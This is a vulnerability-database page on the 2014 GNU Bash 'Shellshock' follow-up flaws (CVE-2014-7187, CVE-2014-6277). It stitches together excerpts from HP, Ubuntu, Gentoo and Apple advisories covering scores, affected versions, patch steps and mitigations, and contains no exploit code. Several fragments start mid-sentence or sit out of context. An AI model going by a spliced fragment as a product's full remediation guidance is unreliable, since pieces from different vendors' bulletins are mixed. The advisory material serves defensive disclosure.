VARIoT IoT vulnerabilities database
| VAR-201409-1148 | CVE-2014-7187 | GNU Bash shell executes commands in exported functions in environment variables |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue. QTS, provided by QNAP Systems, Inc., is the OS for Turbo NAS. QTS contains an OS command injection vulnerability (CWE-78) caused by the GNU Bash vulnerability (JVNVU#97219505). This vulnerability information was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Wakisaka Yuki, University of Electro-Communications. Arbitrary OS commands may be executed with the privileges of the application.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
GNU Bash 3.2 and later are vulnerable; prior versions may also be affected.
NOTE: This vulnerability can only be exploited if the attacker already has
valid administrative login credentials.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068
Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server
Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-02-02
Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight
Control for Linux Central Management Server Pre-boot Execution Environment
that could be exploited remotely resulting in Denial of Service (DoS),
disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
CVE-2014-7196
SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux Central Management Server Pre-boot Execution
Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference        Base Vector                    Base Score
CVE-2014-6271    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-6277    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-6278    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-7169    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-7186    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-7187    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2014-7196    (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central
Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot
Execution Environment. Please update the Bash shell version on the HP Insight
Control for Linux Central Management Server also.
1. On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
# mkdir -p $HOME/tmp/bash
# cd $HOME/tmp/bash
# pwd
<home directory>/tmp/bash
b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for
Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html
to the temporary directory '$HOME/tmp/bash'.
c. Extract the Bash update software package.
# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv
d. Verify the version of the Bash update software:
# ./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
# ldd ./bin/bash
linux-gate.so.1 => (0x008a7000)
libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000)
libdl.so.2 => /lib/libdl.so.2 (0x002c0000)
libc.so.6 => /lib/libc.so.6 (0x0012e000)
/lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control
for Linux Central Management Server Pre-boot Execution Environment system:
# mkdir $HOME/tmp/lib
# cd /lib
# cp * $HOME/tmp/lib
# cd $HOME/tmp
# pwd
<home directory>/tmp
# tar cvf bash_lib.tar *
2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production
RHEL 6.2 OS system to the Insight Control for Linux Central Management Server
Pre-boot Execution Environment system.
3. On the HP Insight Control for Linux Central Management Server Pre-boot
Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there:
# mkdir -p $HOME/tmp/temp-toolkit
# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
# cd $HOME/tmp/temp-toolkit
# tar zxvf toolkit.tar.gz
# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
# $HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005
Free Software Foundation, Inc.
d. Verify dependencies versions:
# ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000)
libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000)
libdl.so.2 => /lib/libdl.so.2 (0x008bf000)
libc.so.6 => /lib/libc.so.6 (0x00777000)
/lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib'.
Then copy the bash binary and the library files to their respective
locations:
# mkdir -p $HOME/tmp/bash_lib
# tar xvf $HOME/tmp/bash_lib.tar -C $HOME/tmp/bash_lib
# cp $HOME/tmp/bash_lib/bash/bin/bash $HOME/tmp/temp-toolkit/bin
# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in
/usr/share/systemimager/boot/i386/standard
# tar czvf toolkit.tar.gz *
# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY
Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
============================================================================
Ubuntu Security Notice USN-2364-1
September 27, 2014
bash vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Bash. (CVE-2014-7186,
CVE-2014-7187)
In addition, this update introduces a hardening measure which adds prefixes
and suffixes around environment variable names which contain shell
functions.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.4
Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.5
Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.4
In general, a standard system update will make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-2364-1
CVE-2014-7186, CVE-2014-7187
Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.4
https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.5
https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.4
.
HP Product                                               Firmware Version
HP StoreEver ESL G3 Tape Libraries with MCB version 2    680H_GS40701
HP StoreEver ESL G3 Tape Libraries with MCB version 1    656H_GS10801
The firmware is customer installable and is available in the Drivers,
Software & Firmware section at the following location:
http://www.hp.com/support/eslg3
Notes:
- Updating the library firmware requires a reboot of the library.
- If the library firmware cannot be updated, HP recommends following the
Mitigation Instructions below.
- Disable DHCP and only use static IP addressing.
No other firmware stream updates are planned beyond the NX-OS 5.x and 6.x
versions listed below for the MDS products.
HP has released and posted the Cisco switch software version NX-OS 6.2(9a) on
HP Support Center (HPSC). This software version 6.2(9a) includes the
fixes for the vulnerability in HP StoreFabric C-series MDS switches which
currently support NX-OS 6.X releases.
HP has released and posted the Cisco switch software version NX-OS 5.2(8e) on
HP Support Center (HPSC). This software version 5.2(8e) includes the fix
for the vulnerability in HP C-series MDS switches which currently support
NX-OS 5.X releases.
All MDS and Nexus 5K switches can function in this configuration. Access is
available through the console port.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Bash: Multiple vulnerabilities
Date: October 04, 2014
Bugs: #523742, #524256
ID: 201410-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple parsing flaws in Bash could allow remote attackers to inject
code or cause a Denial of Service condition.
Affected packages
=================
    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  app-shells/bash              < 4.2_p52               *>= 3.1_p22
                                                          *>= 3.2_p56
                                                          *>= 4.0_p43
                                                          *>= 4.1_p16
                                                           >= 4.2_p52
Description
===========
Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further
parsing flaws in Bash. The unaffected Gentoo packages listed in this
GLSA contain the official patches to fix the issues tracked as
CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the
official patch known as "function prefix patch" is included which
prevents the exploitation of CVE-2014-6278.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Bash 3.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.1_p22:3.1"
All Bash 3.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-3.2_p56:3.2"
All Bash 4.0 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.0_p43:4.0"
All Bash 4.1 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.1_p16:4.1"
All Bash 4.2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/bash-4.2_p52"
References
==========
[ 1 ] CVE-2014-6277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277
[ 2 ] CVE-2014-6278
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278
[ 3 ] CVE-2014-7186
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186
[ 4 ] CVE-2014-7187
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201410-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. This bulletin will be revised when the
update is available.
MITIGATION INFORMATION
HP recommends the following steps to reduce the risk of this
vulnerability:
- Place the HP StoreFabric H-series switch and other data center
critical infrastructure behind a firewall to disallow access from the
Internet.
- Change all HP StoreFabric switch default account passwords, including
the root passwords, from the default factory passwords.
- Examine the list of accounts, including ones on the switch and those
existing on remote authentication servers such as RADIUS, LDAP, and TACACS+,
to ensure only necessary personnel can gain access to HP StoreFabric H-series
switches. Delete guest accounts and temporary accounts created for one-time
usage needs.
- To avoid possible exploit through the embedded web GUI, QuickTools,
disable the web server with the following procedure:
NOTE: After completing this procedure, the user will not be able to
manage the switch using QuickTools.
  - Log in to the Command Line Interface (CLI).
  - Execute the "admin start" command to enter into an admin session.
  - Execute the "set setup services" command and change setting for
    EmbeddedGUIEnabled to "False".
Note: HP and the switch vendor recommend running an active version of
Fabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge
(SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around
information provided in the MITIGATION INFORMATION section below to protect
HP StoreFabric B-series switches from this vulnerability.
- Utilize FOS password policy management to strengthen the complexity,
age, and history requirements of switch account passwords
| VAR-201409-0366 | CVE-2014-6277 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0023, VAR-E-201409-0012, VAR-E-201409-0010, VAR-E-201409-0016, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0554, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0556, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0557, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. QTS, provided by QNAP Systems, Inc., is the OS for Turbo NAS. QTS contains an OS command injection vulnerability (CWE-78) caused by the GNU Bash vulnerability (JVNVU#97219505). This vulnerability information was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Wakisaka Yuki, University of Electro-Communications. Arbitrary OS commands may be executed with the privileges of the application.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script. Customers who
need to upgrade the firmware of their Superdome X or HP Converged System 900
for SAP HANA should contact HP Technical Support to obtain the firmware or
plan to schedule an onsite visit with an HP Services field service
professional.
NOTE: HP strongly recommends implementing the following security best
practices to help reduce both known and future security vulnerability risks:
Isolate the HP Superdome X or HP Converged System 900 for SAP HANA's
management network by keeping it separate from the data or production
network, and not connecting it directly to the Internet without additional
access authentication.
Patch and maintain Lightweight Directory Access Protocol (LDAP) and web
servers.
Use virus scanners, intrusion detection/prevention systems (IDS/IPS), and
vulnerability scanners regularly.
.
Go to the HP Software Depot site at http://www.software.hp.com and search for
HP OneView.
Note: All versions of HP Thin Pro and HP Smart Zero Core operating systems
prior to version 5.1.0 are affected by these vulnerabilities. Following is a
complete list of affected operating systems and Hardware Platforms Affected.
Product Affected: HP ThinPro and HP Smart Zero Core (X86)
Product Versions: v5.1.0 and above
Patch Status: No update required; the Bash shell patch is incorporated into the base
image.
Note: If you participated in the ThinPro 5.1.0 beta program then upgrade to
the release version as soon as it becomes available.
Product Affected: HP ThinPro and HP Smart Zero Core (x86)
Product Versions: v5.0.x
Patch Status: A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-5.0-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
Product Affected: HP ThinPro and HP Smart Zero Core (x86)
Product Versions: v4.4.x
Patch Status: A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
Product Affected: HP ThinPro and HP Smart Zero Core (ARM)
Product Versions: v4.4.x
Patch Status: A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.4-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
Product Affected: HP ThinPro and HP Smart Zero Core (X86)
Product Versions: v4.1, v4.2, and v4.3
Patch Status: A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-x86.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
Product Affected: HP ThinPro and HP Smart Zero Core (ARM)
Product Versions: v4.1, v4.2, and v4.3
Patch Status: A component update is currently available through Easy Update as:
SecurityUpdate-Shellshock-2.0-all-4.1-4.2-4.3-arm.xar .
The update can be also downloaded directly from HP as part of softpaq sp69382
at the following address:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe
Product Affected: HP ThinPro and HP Smart Zero Core (X86)
Product Versions: v3.1, v3.2, and v3.3
Patch Status: Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_i386.deb .
Product Affected: HP ThinPro and HP Smart Zero Core (ARM)
Product Versions: v3.1, v3.2, and v3.3
Patch Status: Download softpaq sp69382 from:
ftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69382.exe which contains an
update package as: bash_4.1-3+deb6u2_armel.deb .
No other firmware
stream updates are planned beyond the NX-OS 5.x and 6.x versions listed below
for the MDS products. This software version 6.2(9a) includes the
fixes for the vulnerability in HP StoreFabric C-series MDS switches which
currently support NX-OS 6.X releases. This software version 5.2(8e) includes the fix
for the vulnerability in HP C-series MDS switches which currently support
NX-OS 5.X releases. This bulletin will be revised
when these updates become available.
MITIGATION INFORMATION
If updating to a NX-OS version containing the fix is not currently possible,
HP recommends the following steps to reduce the risk of this vulnerability:
The "ssh" or "telnet" features may be disabled by the admin user. All MDS and
Nexus 5K switches can function in this configuration. Access is available
through the console port.
Background
==========
Bash is the standard GNU Bourne Again SHell.
.
APPLE-SA-2015-01-27-4 OS X 10.10.2 and Security Update 2015-001
OS X 10.10.2 and Security Update 2015-001 are now available and
address the following:
AFP Server
Available for: OS X Mavericks v10.9.5
Impact: A remote attacker may be able to determine all the network
addresses of the system
Description: The AFP file server supported a command which returned
all the network addresses of the system. This issue was addressed by
removing the addresses from the result.
CVE-ID
CVE-2014-4426 : Craig Young of Tripwire VERT
bash
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: Multiple vulnerabilities in bash, including one that may
allow local attackers to execute arbitrary code
Description: Multiple vulnerabilities existed in bash. These issues
were addressed by updating bash to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Bluetooth
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer signedness error existed in
IOBluetoothFamily which allowed manipulation of kernel memory. This
issue was addressed through improved bounds checking. This issue does
not affect OS X Yosemite systems.
CVE-ID
CVE-2014-4497
Bluetooth
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An error existed in the Bluetooth driver that allowed a
malicious application to control the size of a write to kernel
memory. The issue was addressed through additional input validation.
CVE-ID
CVE-2014-8836 : Ian Beer of Google Project Zero
Bluetooth
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple security issues existed in the Bluetooth
driver, allowing a malicious application to execute arbitrary code
with system privilege. The issues were addressed through additional
input validation.
CVE-ID
CVE-2014-8837 : Roberto Paleari and Aristide Fattori of Emaze
Networks
CFNetwork Cache
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: Website cache may not be fully cleared after leaving private
browsing
Description: A privacy issue existed where browsing data could
remain in the cache after leaving private browsing. This issue was
addressed through a change in caching behavior.
CVE-ID
CVE-2014-4460
CoreGraphics
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4481 : Felipe Andres Manzano of the Binamuse VRT, via the
iSIGHT Partners GVP Program
CPU Software
Available for: OS X Yosemite v10.10 and v10.10.1,
for: MacBook Pro Retina, MacBook Air (Mid 2013 and later),
iMac (Late 2013 and later), Mac Pro (Late 2013)
Impact: A malicious Thunderbolt device may be able to affect
firmware flashing
Description: Thunderbolt devices could modify the host firmware if
connected during an EFI update. This issue was addressed by not
loading option ROMs during updates.
CVE-ID
CVE-2014-4498 : Trammell Hudson of Two Sigma Investments
CommerceKit Framework
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: An attacker with access to a system may be able to recover
Apple ID credentials
Description: An issue existed in the handling of App Store logs. The
App Store process could log Apple ID credentials in the log when
additional logging was enabled. This issue was addressed by
disallowing logging of credentials.
CVE-ID
CVE-2014-4499 : Sten Petersen
CoreGraphics
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: Some third-party applications with non-secure text entry and
mouse events may log those events
Description: Due to the combination of an uninitialized variable and
an application's custom allocator, non-secure text entry and mouse
events may have been logged. This issue was addressed by ensuring
that logging is off by default. This issue did not affect systems
prior to OS X Yosemite.
CVE-ID
CVE-2014-1595 : Steven Michaud of Mozilla working with Kent Howard
CoreGraphics
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
PDF files. The issue was addressed through improved bounds checking.
This issue does not affect OS X Yosemite systems.
CVE-ID
CVE-2014-8816 : Mike Myers, of Digital Operatives LLC
CoreSymbolication
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple type confusion issues existed in
coresymbolicationd's handling of XPC messages. These issues were
addressed through improved type checking.
CVE-ID
CVE-2014-8817 : Ian Beer of Google Project Zero
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Processing a maliciously crafted .dfont file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
.dfont files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4484 : Gaurav Baruah working with HP's Zero Day Initiative
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of font
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4483 : Apple
Foundation
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Viewing a maliciously crafted XML file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the XML parser. This issue
was addressed through improved bounds checking.
CVE-ID
CVE-2014-4485 : Apple
Intel Graphics Driver
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Multiple vulnerabilities in Intel graphics driver
Description: Multiple vulnerabilities existed in the Intel graphics
driver, the most serious of which may have led to arbitrary code
execution with system privileges. This update addresses the issues
through additional bounds checks.
CVE-ID
CVE-2014-8819 : Ian Beer of Google Project Zero
CVE-2014-8820 : Ian Beer of Google Project Zero
CVE-2014-8821 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in
IOAcceleratorFamily's handling of certain IOService userclient types.
This issue was addressed through improved validation of
IOAcceleratorFamily contexts.
CVE-ID
CVE-2014-4486 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A buffer overflow existed in IOHIDFamily. This issue
was addressed with improved bounds checking.
CVE-ID
CVE-2014-4487 : TaiG Jailbreak Team
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in IOHIDFamily's handling of
resource queue metadata. This issue was addressed through improved
validation of metadata.
CVE-ID
CVE-2014-4488 : Apple
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of event queues. This issue was addressed through improved
validation of IOHIDFamily event queue initialization.
CVE-ID
CVE-2014-4489 : @beist
IOHIDFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Executing a malicious application may result in arbitrary
code execution within the kernel
Description: A bounds checking issue existed in a user client vended
by the IOHIDFamily driver which allowed a malicious application to
overwrite arbitrary portions of the kernel address space. The issue
is addressed by removing the vulnerable user client method.
CVE-ID
CVE-2014-8822 : Vitaliy Toropov working with HP's Zero Day Initiative
IOKit
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
IOUSBFamily
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A privileged application may be able to read arbitrary data
from kernel memory
Description: A memory access issue existed in the handling of IOUSB
controller user client functions. This issue was addressed through
improved argument validation.
CVE-ID
CVE-2014-8823 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Specifying a custom cache mode allowed writing to
kernel read-only shared memory segments. This issue was addressed by
not granting write permissions as a side-effect of some custom cache
modes.
CVE-ID
CVE-2014-4495 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-8824 : @PanguTeam
Kernel
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A local attacker can spoof directory service responses to
the kernel, elevate privileges, or gain kernel execution
Description: Issues existed in identitysvc validation of the
directory service resolving process, flag handling, and error
handling. This issue was addressed through improved validation.
CVE-ID
CVE-2014-8825 : Alex Radocea of CrowdStrike
Kernel
Available for: OS X Yosemite v10.10 and v10.10.1
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Kernel
Available for: OS X Mavericks v10.9.5
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391
Kernel
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 and v10.10.1
Impact: Maliciously crafted or compromised applications may be able
to determine addresses in the kernel
Description: An information disclosure issue existed in the handling
of APIs related to kernel extensions. Responses containing an
OSBundleMachOHeaders key may have included kernel addresses, which
may aid in bypassing address space layout randomization protection.
